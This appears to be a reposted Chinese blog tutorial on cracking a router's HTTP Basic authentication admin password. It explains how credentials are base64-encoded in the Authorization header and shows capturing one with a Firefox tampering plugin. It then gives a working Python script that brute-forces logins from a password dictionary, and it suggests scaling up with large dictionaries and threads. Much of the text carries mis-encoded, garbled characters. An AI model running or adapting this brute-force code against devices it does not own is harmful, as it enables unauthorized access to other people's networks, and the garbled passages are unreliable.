先看上面的文章

------------

Evi1m0 Daniel破解了路由器的連接密碼，然后破解了路由器的管理登錄密碼. 此過程是一次性的，因此在這里我將詳細(xì)討論.

首先，什么是http基本認(rèn)證？

在HTTP協(xié)議進(jìn)行通信的過程中，HTTP協(xié)議定義了基本認(rèn)證過程以允許HTTP服務(wù)器對(duì)WEB瀏覽器進(jìn)行用戶的方法，當(dāng)一個(gè)客戶端向HTTP服務(wù) 器進(jìn)行數(shù)據(jù)請(qǐng)求時(shí)，如果客戶端未被認(rèn)證，則HTTP服務(wù)器將通過基本認(rèn)證過程對(duì)客戶端的用戶名及密碼進(jìn)行驗(yàn)證，以決定用戶是否合法�？蛻舳嗽诮邮盏紿TTP服務(wù)器的身份認(rèn)證要求后，會(huì)提示用戶輸入用戶名及密碼，然后將用戶名及密碼以BASE64加密，加密后的密文將附加于請(qǐng)求信息中， 如當(dāng)用戶名為anjuta，密碼為：123456時(shí)，客戶端將用戶名和密碼用“：”合并，并將合并后的字符串用BASE64加密為密文，并于每次請(qǐng)求數(shù)據(jù) 時(shí)，將密文附加于請(qǐng)求頭（Request Header）中。HTTP服務(wù)器在每次收到請(qǐng)求包后，根據(jù)協(xié)議取得客戶端附加的用戶信息（BASE64加密的用戶名和密碼），解開請(qǐng)求包，對(duì)用戶名及密碼進(jìn)行驗(yàn)證，如果用 戶名及密碼正確，則根據(jù)客戶端請(qǐng)求，返回客戶端所需要的數(shù)據(jù);否則，返回錯(cuò)誤代碼或重新要求客戶端提供用戶名及密碼。

讓我們先抓取數(shù)據(jù)包，看看http標(biāo)頭是什么樣子.

我使用firefox +篡改數(shù)據(jù)，請(qǐng)先安裝此插件.

安裝后，按Alt鍵顯示菜單欄，工具-篡改數(shù)據(jù)，

打開路由器的登錄URL，我的是

點(diǎn)擊上方的啟動(dòng)篡改，然后輸入帳戶密碼，

點(diǎn)擊篡改以攔截此請(qǐng)求，然后您可以看到

請(qǐng)參閱授權(quán)，以下顯然是base64編碼的內(nèi)容，讓我們對(duì)其進(jìn)行解碼并查看

這是我們的帳戶密碼，中間帶有一個(gè)冒號(hào)，然后是base64編碼.

了解基本原理，我們可以編寫一個(gè)程序來破解它.

找到一個(gè)帳戶和密碼字典，對(duì)其進(jìn)行編碼，然后將其添加到http標(biāo)頭中. 這很容易.

#coding:utf-8
import base64
import urllib2
password_dic = [["root", "root"], ["admin", "admin"], ["admin", "rootroot"]]
request = urllib2.Request('http://192.168.1.253')
#request.add_header('Authorization', 'Basic YWRtaW46cm9vdHJvb3Q=')
for item in password_dic:
    psw_base64 = "Basic " + base64.b64encode(item[0] + ":" + item[1])
    request.add_header('Authorization', psw_base64)
    try:
        response = urllib2.urlopen(request)
        print "Correct! Username: %s, password: %s" % (item[0], item[1])
        break
    except urllib2.HTTPError:
        print "Error!"

使用python隨附的urllib2，上面的password_dic由我自己編寫. 如果您真的想破解它，它將有一個(gè)大詞典，它將在多個(gè)線程中運(yùn)行.

request.add_header('Authorization', psw_base64)

就將我們構(gòu)造的賬號(hào)密碼的http頭加進(jìn)去了。

本文來自本站，轉(zhuǎn)載請(qǐng)注明本文網(wǎng)址：
http://www.pc-fly.com/a/tongxingongju/article-296389-1.html